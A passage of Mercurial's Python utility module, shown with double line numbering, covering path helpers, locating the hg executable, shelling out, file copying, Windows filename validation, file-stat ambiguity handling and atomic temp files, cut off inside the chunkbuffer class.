1036 1041 no effect on when GCs are triggered, only on what objects the GC looks
1037 1042 into. As a workaround, disable GC while building complex (huge)
1038 1043 containers.
1039 1044
1040 1045 This garbage collector issue have been fixed in 2.7. But it still affect
1041 1046 CPython's performance.
1042 1047 """
1043 1048 def wrapper(*args, **kwargs):
1044 1049 gcenabled = gc.isenabled()
1045 1050 gc.disable()
1046 1051 try:
1047 1052 return func(*args, **kwargs)
1048 1053 finally:
1049 1054 if gcenabled:
1050 1055 gc.enable()
1051 1056 return wrapper
1052 1057
1053 1058 if pycompat.ispypy:
1054 1059 # PyPy runs slower with gc disabled
1055 1060 nogc = lambda x: x
1056 1061
1057 1062 def pathto(root, n1, n2):
1058 1063 '''return the relative path from one place to another.
1059 1064 root should use os.sep to separate directories
1060 1065 n1 should use os.sep to separate directories
1061 1066 n2 should use "/" to separate directories
1062 1067 returns an os.sep-separated path.
1063 1068
1064 1069 If n1 is a relative path, it's assumed it's
1065 1070 relative to root.
1066 1071 n2 should always be relative to root.
1067 1072 '''
1068 1073 if not n1:
1069 1074 return localpath(n2)
1070 1075 if os.path.isabs(n1):
1071 1076 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 1077 return os.path.join(root, localpath(n2))
1073 1078 n2 = '/'.join((pconvert(root), n2))
1074 1079 a, b = splitpath(n1), n2.split('/')
1075 1080 a.reverse()
1076 1081 b.reverse()
1077 1082 while a and b and a[-1] == b[-1]:
1078 1083 a.pop()
1079 1084 b.pop()
1080 1085 b.reverse()
1081 1086 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082 1087
1083 1088 def mainfrozen():
1084 1089 """return True if we are a frozen executable.
1085 1090
1086 1091 The code supports py2exe (most common, Windows only) and tools/freeze
1087 1092 (portable, not much used).
1088 1093 """
1089 1094 return (safehasattr(sys, "frozen") or # new py2exe
1090 1095 safehasattr(sys, "importers") or # old py2exe
1091 1096 imp.is_frozen(u"__main__")) # tools/freeze
1092 1097
1093 1098 # the location of data files matching the source code
1094 1099 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 1100 # executable version (py2exe) doesn't support __file__
1096 1101 datapath = os.path.dirname(pycompat.sysexecutable)
1097 1102 else:
1098 1103 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099 1104
1100 1105 i18n.setdatapath(datapath)
1101 1106
1102 1107 _hgexecutable = None
1103 1108
1104 1109 def hgexecutable():
1105 1110 """return location of the 'hg' executable.
1106 1111
1107 1112 Defaults to $HG or 'hg' in the search path.
1108 1113 """
1109 1114 if _hgexecutable is None:
1110 1115 hg = encoding.environ.get('HG')
1111 1116 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 1117 if hg:
1113 1118 _sethgexecutable(hg)
1114 1119 elif mainfrozen():
1115 1120 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 1121 # Env variable set by py2app
1117 1122 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 1123 else:
1119 1124 _sethgexecutable(pycompat.sysexecutable)
1120 1125 elif (os.path.basename(
1121 1126 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 1127 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 1128 else:
1124 1129 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 1130 _sethgexecutable(exe)
1126 1131 return _hgexecutable
1127 1132
1128 1133 def _sethgexecutable(path):
1129 1134 """set location of the 'hg' executable"""
1130 1135 global _hgexecutable
1131 1136 _hgexecutable = path
1132 1137
1133 1138 def _isstdout(f):
1134 1139 fileno = getattr(f, 'fileno', None)
1135 1140 return fileno and fileno() == sys.__stdout__.fileno()
1136 1141
1137 1142 def shellenviron(environ=None):
1138 1143 """return environ with optional override, useful for shelling out"""
1139 1144 def py2shell(val):
1140 1145 'convert python object into string that is useful to shell'
1141 1146 if val is None or val is False:
1142 1147 return '0'
1143 1148 if val is True:
1144 1149 return '1'
1145 1150 return str(val)
1146 1151 env = dict(encoding.environ)
1147 1152 if environ:
1148 1153 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 1154 env['HG'] = hgexecutable()
1150 1155 return env
1151 1156
1152 1157 def system(cmd, environ=None, cwd=None, out=None):
1153 1158 '''enhanced shell command execution.
1154 1159 run with environment maybe modified, maybe in different dir.
1155 1160
1156 1161 if out is specified, it is assumed to be a file-like object that has a
1157 1162 write() method. stdout and stderr will be redirected to out.'''
1158 1163 try:
1159 1164 stdout.flush()
1160 1165 except Exception:
1161 1166 pass
1162 1167 cmd = quotecommand(cmd)
1163 1168 env = shellenviron(environ)
1164 1169 if out is None or _isstdout(out):
1165 1170 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 1171 env=env, cwd=cwd)
1167 1172 else:
1168 1173 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 1174 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 1175 stderr=subprocess.STDOUT)
1171 1176 for line in iter(proc.stdout.readline, ''):
1172 1177 out.write(line)
1173 1178 proc.wait()
1174 1179 rc = proc.returncode
1175 1180 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 1181 rc = 0
1177 1182 return rc
1178 1183
1179 1184 def checksignature(func):
1180 1185 '''wrap a function with code to check for calling errors'''
1181 1186 def check(*args, **kwargs):
1182 1187 try:
1183 1188 return func(*args, **kwargs)
1184 1189 except TypeError:
1185 1190 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 1191 raise error.SignatureError
1187 1192 raise
1188 1193
1189 1194 return check
1190 1195
1191 1196 # a whilelist of known filesystems where hardlink works reliably
1192 1197 _hardlinkfswhitelist = {
1193 1198 'btrfs',
1194 1199 'ext2',
1195 1200 'ext3',
1196 1201 'ext4',
1197 1202 'hfs',
1198 1203 'jfs',
1199 1204 'reiserfs',
1200 1205 'tmpfs',
1201 1206 'ufs',
1202 1207 'xfs',
1203 1208 'zfs',
1204 1209 }
1205 1210
1206 1211 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 1212 '''copy a file, preserving mode and optionally other stat info like
1208 1213 atime/mtime
1209 1214
1210 1215 checkambig argument is used with filestat, and is useful only if
1211 1216 destination file is guarded by any lock (e.g. repo.lock or
1212 1217 repo.wlock).
1213 1218
1214 1219 copystat and checkambig should be exclusive.
1215 1220 '''
1216 1221 assert not (copystat and checkambig)
1217 1222 oldstat = None
1218 1223 if os.path.lexists(dest):
1219 1224 if checkambig:
1220 1225 oldstat = checkambig and filestat.frompath(dest)
1221 1226 unlink(dest)
1222 1227 if hardlink:
1223 1228 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 1229 # unless we are confident that dest is on a whitelisted filesystem.
1225 1230 try:
1226 1231 fstype = getfstype(os.path.dirname(dest))
1227 1232 except OSError:
1228 1233 fstype = None
1229 1234 if fstype not in _hardlinkfswhitelist:
1230 1235 hardlink = False
1231 1236 if hardlink:
1232 1237 try:
1233 1238 oslink(src, dest)
1234 1239 return
1235 1240 except (IOError, OSError):
1236 1241 pass # fall back to normal copy
1237 1242 if os.path.islink(src):
1238 1243 os.symlink(os.readlink(src), dest)
1239 1244 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 1245 # for them anyway
1241 1246 else:
1242 1247 try:
1243 1248 shutil.copyfile(src, dest)
1244 1249 if copystat:
1245 1250 # copystat also copies mode
1246 1251 shutil.copystat(src, dest)
1247 1252 else:
1248 1253 shutil.copymode(src, dest)
1249 1254 if oldstat and oldstat.stat:
1250 1255 newstat = filestat.frompath(dest)
1251 1256 if newstat.isambig(oldstat):
1252 1257 # stat of copied file is ambiguous to original one
1253 1258 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 1259 os.utime(dest, (advanced, advanced))
1255 1260 except shutil.Error as inst:
1256 1261 raise Abort(str(inst))
1257 1262
1258 1263 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 1264 """Copy a directory tree using hardlinks if possible."""
1260 1265 num = 0
1261 1266
1262 1267 gettopic = lambda: hardlink and _('linking') or _('copying')
1263 1268
1264 1269 if os.path.isdir(src):
1265 1270 if hardlink is None:
1266 1271 hardlink = (os.stat(src).st_dev ==
1267 1272 os.stat(os.path.dirname(dst)).st_dev)
1268 1273 topic = gettopic()
1269 1274 os.mkdir(dst)
1270 1275 for name, kind in listdir(src):
1271 1276 srcname = os.path.join(src, name)
1272 1277 dstname = os.path.join(dst, name)
1273 1278 def nprog(t, pos):
1274 1279 if pos is not None:
1275 1280 return progress(t, pos + num)
1276 1281 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 1282 num += n
1278 1283 else:
1279 1284 if hardlink is None:
1280 1285 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 1286 os.stat(os.path.dirname(dst)).st_dev)
1282 1287 topic = gettopic()
1283 1288
1284 1289 if hardlink:
1285 1290 try:
1286 1291 oslink(src, dst)
1287 1292 except (IOError, OSError):
1288 1293 hardlink = False
1289 1294 shutil.copy(src, dst)
1290 1295 else:
1291 1296 shutil.copy(src, dst)
1292 1297 num += 1
1293 1298 progress(topic, num)
1294 1299 progress(topic, None)
1295 1300
1296 1301 return hardlink, num
1297 1302
1298 1303 _winreservednames = {
1299 1304 'con', 'prn', 'aux', 'nul',
1300 1305 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 1306 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 1307 }
1303 1308 _winreservedchars = ':*?"<>|'
1304 1309 def checkwinfilename(path):
1305 1310 r'''Check that the base-relative path is a valid filename on Windows.
1306 1311 Returns None if the path is ok, or a UI string describing the problem.
1307 1312
1308 1313 >>> checkwinfilename(b"just/a/normal/path")
1309 1314 >>> checkwinfilename(b"foo/bar/con.xml")
1310 1315 "filename contains 'con', which is reserved on Windows"
1311 1316 >>> checkwinfilename(b"foo/con.xml/bar")
1312 1317 "filename contains 'con', which is reserved on Windows"
1313 1318 >>> checkwinfilename(b"foo/bar/xml.con")
1314 1319 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 1320 "filename contains 'AUX', which is reserved on Windows"
1316 1321 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 1322 "filename contains ':', which is reserved on Windows"
1318 1323 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 1324 "filename contains '\\x07', which is invalid on Windows"
1320 1325 >>> checkwinfilename(b"foo/bar/bla ")
1321 1326 "filename ends with ' ', which is not allowed on Windows"
1322 1327 >>> checkwinfilename(b"../bar")
1323 1328 >>> checkwinfilename(b"foo\\")
1324 1329 "filename ends with '\\', which is invalid on Windows"
1325 1330 >>> checkwinfilename(b"foo\\/bar")
1326 1331 "directory name ends with '\\', which is invalid on Windows"
1327 1332 '''
1328 1333 if path.endswith('\\'):
1329 1334 return _("filename ends with '\\', which is invalid on Windows")
1330 1335 if '\\/' in path:
1331 1336 return _("directory name ends with '\\', which is invalid on Windows")
1332 1337 for n in path.replace('\\', '/').split('/'):
1333 1338 if not n:
1334 1339 continue
1335 1340 for c in _filenamebytestr(n):
1336 1341 if c in _winreservedchars:
1337 1342 return _("filename contains '%s', which is reserved "
1338 1343 "on Windows") % c
1339 1344 if ord(c) <= 31:
1340 1345 return _("filename contains '%s', which is invalid "
1341 1346 "on Windows") % escapestr(c)
1342 1347 base = n.split('.')[0]
1343 1348 if base and base.lower() in _winreservednames:
1344 1349 return _("filename contains '%s', which is reserved "
1345 1350 "on Windows") % base
1346 1351 t = n[-1:]
1347 1352 if t in '. ' and n not in '..':
1348 1353 return _("filename ends with '%s', which is not allowed "
1349 1354 "on Windows") % t
1350 1355
1351 1356 if pycompat.iswindows:
1352 1357 checkosfilename = checkwinfilename
1353 1358 timer = time.clock
1354 1359 else:
1355 1360 checkosfilename = platform.checkosfilename
1356 1361 timer = time.time
1357 1362
1358 1363 if safehasattr(time, "perf_counter"):
1359 1364 timer = time.perf_counter
1360 1365
1361 1366 def makelock(info, pathname):
1362 1367 try:
1363 1368 return os.symlink(info, pathname)
1364 1369 except OSError as why:
1365 1370 if why.errno == errno.EEXIST:
1366 1371 raise
1367 1372 except AttributeError: # no symlink in os
1368 1373 pass
1369 1374
1370 1375 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 1376 os.write(ld, info)
1372 1377 os.close(ld)
1373 1378
1374 1379 def readlock(pathname):
1375 1380 try:
1376 1381 return os.readlink(pathname)
1377 1382 except OSError as why:
1378 1383 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 1384 raise
1380 1385 except AttributeError: # no symlink in os
1381 1386 pass
1382 1387 fp = posixfile(pathname)
1383 1388 r = fp.read()
1384 1389 fp.close()
1385 1390 return r
1386 1391
1387 1392 def fstat(fp):
1388 1393 '''stat file object that may not have fileno method.'''
1389 1394 try:
1390 1395 return os.fstat(fp.fileno())
1391 1396 except AttributeError:
1392 1397 return os.stat(fp.name)
1393 1398
1394 1399 # File system features
1395 1400
1396 1401 def fscasesensitive(path):
1397 1402 """
1398 1403 Return true if the given path is on a case-sensitive filesystem
1399 1404
1400 1405 Requires a path (like /foo/.hg) ending with a foldable final
1401 1406 directory component.
1402 1407 """
1403 1408 s1 = os.lstat(path)
1404 1409 d, b = os.path.split(path)
1405 1410 b2 = b.upper()
1406 1411 if b == b2:
1407 1412 b2 = b.lower()
1408 1413 if b == b2:
1409 1414 return True # no evidence against case sensitivity
1410 1415 p2 = os.path.join(d, b2)
1411 1416 try:
1412 1417 s2 = os.lstat(p2)
1413 1418 if s2 == s1:
1414 1419 return False
1415 1420 return True
1416 1421 except OSError:
1417 1422 return True
1418 1423
1419 1424 try:
1420 1425 import re2
1421 1426 _re2 = None
1422 1427 except ImportError:
1423 1428 _re2 = False
1424 1429
1425 1430 class _re(object):
1426 1431 def _checkre2(self):
1427 1432 global _re2
1428 1433 try:
1429 1434 # check if match works, see issue3964
1430 1435 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 1436 except ImportError:
1432 1437 _re2 = False
1433 1438
1434 1439 def compile(self, pat, flags=0):
1435 1440 '''Compile a regular expression, using re2 if possible
1436 1441
1437 1442 For best performance, use only re2-compatible regexp features. The
1438 1443 only flags from the re module that are re2-compatible are
1439 1444 IGNORECASE and MULTILINE.'''
1440 1445 if _re2 is None:
1441 1446 self._checkre2()
1442 1447 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 1448 if flags & remod.IGNORECASE:
1444 1449 pat = '(?i)' + pat
1445 1450 if flags & remod.MULTILINE:
1446 1451 pat = '(?m)' + pat
1447 1452 try:
1448 1453 return re2.compile(pat)
1449 1454 except re2.error:
1450 1455 pass
1451 1456 return remod.compile(pat, flags)
1452 1457
1453 1458 @propertycache
1454 1459 def escape(self):
1455 1460 '''Return the version of escape corresponding to self.compile.
1456 1461
1457 1462 This is imperfect because whether re2 or re is used for a particular
1458 1463 function depends on the flags, etc, but it's the best we can do.
1459 1464 '''
1460 1465 global _re2
1461 1466 if _re2 is None:
1462 1467 self._checkre2()
1463 1468 if _re2:
1464 1469 return re2.escape
1465 1470 else:
1466 1471 return remod.escape
1467 1472
1468 1473 re = _re()
1469 1474
1470 1475 _fspathcache = {}
1471 1476 def fspath(name, root):
1472 1477 '''Get name in the case stored in the filesystem
1473 1478
1474 1479 The name should be relative to root, and be normcase-ed for efficiency.
1475 1480
1476 1481 Note that this function is unnecessary, and should not be
1477 1482 called, for case-sensitive filesystems (simply because it's expensive).
1478 1483
1479 1484 The root should be normcase-ed, too.
1480 1485 '''
1481 1486 def _makefspathcacheentry(dir):
1482 1487 return dict((normcase(n), n) for n in os.listdir(dir))
1483 1488
1484 1489 seps = pycompat.ossep
1485 1490 if pycompat.osaltsep:
1486 1491 seps = seps + pycompat.osaltsep
1487 1492 # Protect backslashes. This gets silly very quickly.
1488 1493 seps.replace('\\','\\\\')
1489 1494 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 1495 dir = os.path.normpath(root)
1491 1496 result = []
1492 1497 for part, sep in pattern.findall(name):
1493 1498 if sep:
1494 1499 result.append(sep)
1495 1500 continue
1496 1501
1497 1502 if dir not in _fspathcache:
1498 1503 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 1504 contents = _fspathcache[dir]
1500 1505
1501 1506 found = contents.get(part)
1502 1507 if not found:
1503 1508 # retry "once per directory" per "dirstate.walk" which
1504 1509 # may take place for each patches of "hg qpush", for example
1505 1510 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 1511 found = contents.get(part)
1507 1512
1508 1513 result.append(found or part)
1509 1514 dir = os.path.join(dir, part)
1510 1515
1511 1516 return ''.join(result)
1512 1517
1513 1518 def getfstype(dirpath):
1514 1519 '''Get the filesystem type name from a directory (best-effort)
1515 1520
1516 1521 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 1522 '''
1518 1523 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519 1524
1520 1525 def checknlink(testfile):
1521 1526 '''check whether hardlink count reporting works properly'''
1522 1527
1523 1528 # testfile may be open, so we need a separate file for checking to
1524 1529 # work around issue2543 (or testfile may get lost on Samba shares)
1525 1530 f1, f2, fp = None, None, None
1526 1531 try:
1527 1532 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 1533 suffix='1~', dir=os.path.dirname(testfile))
1529 1534 os.close(fd)
1530 1535 f2 = '%s2~' % f1[:-2]
1531 1536
1532 1537 oslink(f1, f2)
1533 1538 # nlinks() may behave differently for files on Windows shares if
1534 1539 # the file is open.
1535 1540 fp = posixfile(f2)
1536 1541 return nlinks(f2) > 1
1537 1542 except OSError:
1538 1543 return False
1539 1544 finally:
1540 1545 if fp is not None:
1541 1546 fp.close()
1542 1547 for f in (f1, f2):
1543 1548 try:
1544 1549 if f is not None:
1545 1550 os.unlink(f)
1546 1551 except OSError:
1547 1552 pass
1548 1553
1549 1554 def endswithsep(path):
1550 1555 '''Check path ends with os.sep or os.altsep.'''
1551 1556 return (path.endswith(pycompat.ossep)
1552 1557 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553 1558
1554 1559 def splitpath(path):
1555 1560 '''Split path by os.sep.
1556 1561 Note that this function does not use os.altsep because this is
1557 1562 an alternative of simple "xxx.split(os.sep)".
1558 1563 It is recommended to use os.path.normpath() before using this
1559 1564 function if need.'''
1560 1565 return path.split(pycompat.ossep)
1561 1566
1562 1567 def gui():
1563 1568 '''Are we running in a GUI?'''
1564 1569 if pycompat.isdarwin:
1565 1570 if 'SSH_CONNECTION' in encoding.environ:
1566 1571 # handle SSH access to a box where the user is logged in
1567 1572 return False
1568 1573 elif getattr(osutil, 'isgui', None):
1569 1574 # check if a CoreGraphics session is available
1570 1575 return osutil.isgui()
1571 1576 else:
1572 1577 # pure build; use a safe default
1573 1578 return True
1574 1579 else:
1575 1580 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576 1581
1577 1582 def mktempcopy(name, emptyok=False, createmode=None):
1578 1583 """Create a temporary file with the same contents from name
1579 1584
1580 1585 The permission bits are copied from the original file.
1581 1586
1582 1587 If the temporary file is going to be truncated immediately, you
1583 1588 can use emptyok=True as an optimization.
1584 1589
1585 1590 Returns the name of the temporary file.
1586 1591 """
1587 1592 d, fn = os.path.split(name)
1588 1593 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 1594 os.close(fd)
1590 1595 # Temporary files are created with mode 0600, which is usually not
1591 1596 # what we want. If the original file already exists, just copy
1592 1597 # its mode. Otherwise, manually obey umask.
1593 1598 copymode(name, temp, createmode)
1594 1599 if emptyok:
1595 1600 return temp
1596 1601 try:
1597 1602 try:
1598 1603 ifp = posixfile(name, "rb")
1599 1604 except IOError as inst:
1600 1605 if inst.errno == errno.ENOENT:
1601 1606 return temp
1602 1607 if not getattr(inst, 'filename', None):
1603 1608 inst.filename = name
1604 1609 raise
1605 1610 ofp = posixfile(temp, "wb")
1606 1611 for chunk in filechunkiter(ifp):
1607 1612 ofp.write(chunk)
1608 1613 ifp.close()
1609 1614 ofp.close()
1610 1615 except: # re-raises
1611 1616 try:
1612 1617 os.unlink(temp)
1613 1618 except OSError:
1614 1619 pass
1615 1620 raise
1616 1621 return temp
1617 1622
1618 1623 class filestat(object):
1619 1624 """help to exactly detect change of a file
1620 1625
1621 1626 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 1627 exists. Otherwise, it is None. This can avoid preparative
1623 1628 'exists()' examination on client side of this class.
1624 1629 """
1625 1630 def __init__(self, stat):
1626 1631 self.stat = stat
1627 1632
1628 1633 @classmethod
1629 1634 def frompath(cls, path):
1630 1635 try:
1631 1636 stat = os.stat(path)
1632 1637 except OSError as err:
1633 1638 if err.errno != errno.ENOENT:
1634 1639 raise
1635 1640 stat = None
1636 1641 return cls(stat)
1637 1642
1638 1643 @classmethod
1639 1644 def fromfp(cls, fp):
1640 1645 stat = os.fstat(fp.fileno())
1641 1646 return cls(stat)
1642 1647
1643 1648 __hash__ = object.__hash__
1644 1649
1645 1650 def __eq__(self, old):
1646 1651 try:
1647 1652 # if ambiguity between stat of new and old file is
1648 1653 # avoided, comparison of size, ctime and mtime is enough
1649 1654 # to exactly detect change of a file regardless of platform
1650 1655 return (self.stat.st_size == old.stat.st_size and
1651 1656 self.stat.st_ctime == old.stat.st_ctime and
1652 1657 self.stat.st_mtime == old.stat.st_mtime)
1653 1658 except AttributeError:
1654 1659 pass
1655 1660 try:
1656 1661 return self.stat is None and old.stat is None
1657 1662 except AttributeError:
1658 1663 return False
1659 1664
1660 1665 def isambig(self, old):
1661 1666 """Examine whether new (= self) stat is ambiguous against old one
1662 1667
1663 1668 "S[N]" below means stat of a file at N-th change:
1664 1669
1665 1670 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 1671 - S[n-1].ctime == S[n].ctime
1667 1672 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 1673 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 1674 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 1675 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671 1676
1672 1677 Case (*2) above means that a file was changed twice or more at
1673 1678 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 1679 is ambiguous.
1675 1680
1676 1681 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 1682 timestamp is ambiguous".
1678 1683
1679 1684 But advancing mtime only in case (*2) doesn't work as
1680 1685 expected, because naturally advanced S[n].mtime in case (*1)
1681 1686 might be equal to manually advanced S[n-1 or earlier].mtime.
1682 1687
1683 1688 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 1689 treated as ambiguous regardless of mtime, to avoid overlooking
1685 1690 by confliction between such mtime.
1686 1691
1687 1692 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 1693 S[n].mtime", even if size of a file isn't changed.
1689 1694 """
1690 1695 try:
1691 1696 return (self.stat.st_ctime == old.stat.st_ctime)
1692 1697 except AttributeError:
1693 1698 return False
1694 1699
1695 1700 def avoidambig(self, path, old):
1696 1701 """Change file stat of specified path to avoid ambiguity
1697 1702
1698 1703 'old' should be previous filestat of 'path'.
1699 1704
1700 1705 This skips avoiding ambiguity, if a process doesn't have
1701 1706 appropriate privileges for 'path'. This returns False in this
1702 1707 case.
1703 1708
1704 1709 Otherwise, this returns True, as "ambiguity is avoided".
1705 1710 """
1706 1711 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 1712 try:
1708 1713 os.utime(path, (advanced, advanced))
1709 1714 except OSError as inst:
1710 1715 if inst.errno == errno.EPERM:
1711 1716 # utime() on the file created by another user causes EPERM,
1712 1717 # if a process doesn't have appropriate privileges
1713 1718 return False
1714 1719 raise
1715 1720 return True
1716 1721
1717 1722 def __ne__(self, other):
1718 1723 return not self == other
1719 1724
1720 1725 class atomictempfile(object):
1721 1726 '''writable file object that atomically updates a file
1722 1727
1723 1728 All writes will go to a temporary copy of the original file. Call
1724 1729 close() when you are done writing, and atomictempfile will rename
1725 1730 the temporary copy to the original name, making the changes
1726 1731 visible. If the object is destroyed without being closed, all your
1727 1732 writes are discarded.
1728 1733
1729 1734 checkambig argument of constructor is used with filestat, and is
1730 1735 useful only if target file is guarded by any lock (e.g. repo.lock
1731 1736 or repo.wlock).
1732 1737 '''
1733 1738 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 1739 self.__name = name # permanent name
1735 1740 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 1741 createmode=createmode)
1737 1742 self._fp = posixfile(self._tempname, mode)
1738 1743 self._checkambig = checkambig
1739 1744
1740 1745 # delegated methods
1741 1746 self.read = self._fp.read
1742 1747 self.write = self._fp.write
1743 1748 self.seek = self._fp.seek
1744 1749 self.tell = self._fp.tell
1745 1750 self.fileno = self._fp.fileno
1746 1751
1747 1752 def close(self):
1748 1753 if not self._fp.closed:
1749 1754 self._fp.close()
1750 1755 filename = localpath(self.__name)
1751 1756 oldstat = self._checkambig and filestat.frompath(filename)
1752 1757 if oldstat and oldstat.stat:
1753 1758 rename(self._tempname, filename)
1754 1759 newstat = filestat.frompath(filename)
1755 1760 if newstat.isambig(oldstat):
1756 1761 # stat of changed file is ambiguous to original one
1757 1762 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 1763 os.utime(filename, (advanced, advanced))
1759 1764 else:
1760 1765 rename(self._tempname, filename)
1761 1766
1762 1767 def discard(self):
1763 1768 if not self._fp.closed:
1764 1769 try:
1765 1770 os.unlink(self._tempname)
1766 1771 except OSError:
1767 1772 pass
1768 1773 self._fp.close()
1769 1774
1770 1775 def __del__(self):
1771 1776 if safehasattr(self, '_fp'): # constructor actually did something
1772 1777 self.discard()
1773 1778
1774 1779 def __enter__(self):
1775 1780 return self
1776 1781
1777 1782 def __exit__(self, exctype, excvalue, traceback):
1778 1783 if exctype is not None:
1779 1784 self.discard()
1780 1785 else:
1781 1786 self.close()
1782 1787
1783 1788 def unlinkpath(f, ignoremissing=False):
1784 1789 """unlink and remove the directory if it is empty"""
1785 1790 if ignoremissing:
1786 1791 tryunlink(f)
1787 1792 else:
1788 1793 unlink(f)
1789 1794 # try removing directories that might now be empty
1790 1795 try:
1791 1796 removedirs(os.path.dirname(f))
1792 1797 except OSError:
1793 1798 pass
1794 1799
1795 1800 def tryunlink(f):
1796 1801 """Attempt to remove a file, ignoring ENOENT errors."""
1797 1802 try:
1798 1803 unlink(f)
1799 1804 except OSError as e:
1800 1805 if e.errno != errno.ENOENT:
1801 1806 raise
1802 1807
1803 1808 def makedirs(name, mode=None, notindexed=False):
1804 1809 """recursive directory creation with parent mode inheritance
1805 1810
1806 1811 Newly created directories are marked as "not to be indexed by
1807 1812 the content indexing service", if ``notindexed`` is specified
1808 1813 for "write" mode access.
1809 1814 """
1810 1815 try:
1811 1816 makedir(name, notindexed)
1812 1817 except OSError as err:
1813 1818 if err.errno == errno.EEXIST:
1814 1819 return
1815 1820 if err.errno != errno.ENOENT or not name:
1816 1821 raise
1817 1822 parent = os.path.dirname(os.path.abspath(name))
1818 1823 if parent == name:
1819 1824 raise
1820 1825 makedirs(parent, mode, notindexed)
1821 1826 try:
1822 1827 makedir(name, notindexed)
1823 1828 except OSError as err:
1824 1829 # Catch EEXIST to handle races
1825 1830 if err.errno == errno.EEXIST:
1826 1831 return
1827 1832 raise
1828 1833 if mode is not None:
1829 1834 os.chmod(name, mode)
1830 1835
1831 1836 def readfile(path):
1832 1837 with open(path, 'rb') as fp:
1833 1838 return fp.read()
1834 1839
1835 1840 def writefile(path, text):
1836 1841 with open(path, 'wb') as fp:
1837 1842 fp.write(text)
1838 1843
1839 1844 def appendfile(path, text):
1840 1845 with open(path, 'ab') as fp:
1841 1846 fp.write(text)
1842 1847
1843 1848 class chunkbuffer(object):
1844 1849 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 1850 iterator over chunks of arbitrary size."""
1846 1851
1847 1852 def __init__(self, in_iter):
1848 1853 """in_iter is the iterator that's iterating over the input chunks."""
1849 1854 def splitbig(chunks):
1850 1855 for chunk in chunks:
1851 1856 if len(chunk) > 2**20:
1852 1857 pos = 0
1853 1858 while pos < len(chunk):
1854 1859 end = pos + 2 ** 18
1855 1860 yield chunk[pos:end]
1856 1861 pos = end
1857 1862 else:
1858 1863 yield chunk
1859 1864 self.iter = splitbig(in_iter)
1860 1865 self._queue = collections.deque()
1861 1866 self._chunkoffset = 0
1862 1867
1863 1868 def read(self, l=None):
1864 1869 """Read L bytes of data from the iterator of chunks of data.
1865 1870 Returns less than L bytes if the iterator runs dry.
1866 1871
1867 1872 If size parameter is omitted, read everything"""
1868 1873 if l is None:
1869 1874 return ''.join(self.iter)
1870 1875
1871 1876 left = l
1872 1877 buf = []
1873 1878 queue = self._queue
1874 1879 while left > 0:
1875 1880 # refill the queue
1876 1881 if not queue:
1877 1882 target = 2**18
1878 1883 for chunk in self.iter:
1879 1884 queue.append(chunk)
1880 1885 target -= len(chunk)
1881 1886 if target <= 0:
1882 1887 break
1883 1888 if not queue:
1884 1889 break
1885 1890
1886 1891 # The easy way to do this would be to queue.popleft(), modify the
1887 1892 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 1893 # where we read partial chunk content, this incurs 2 dequeue
1889 1894 # mutations and creates a new str for the remaining chunk in the
1890 1895 # queue. Our code below avoids this overhead.
1891 1896
1892 1897 chunk = queue[0]
1893 1898 chunkl = len(chunk)
1894 1899 offset = self._chunkoffset
1895 1900
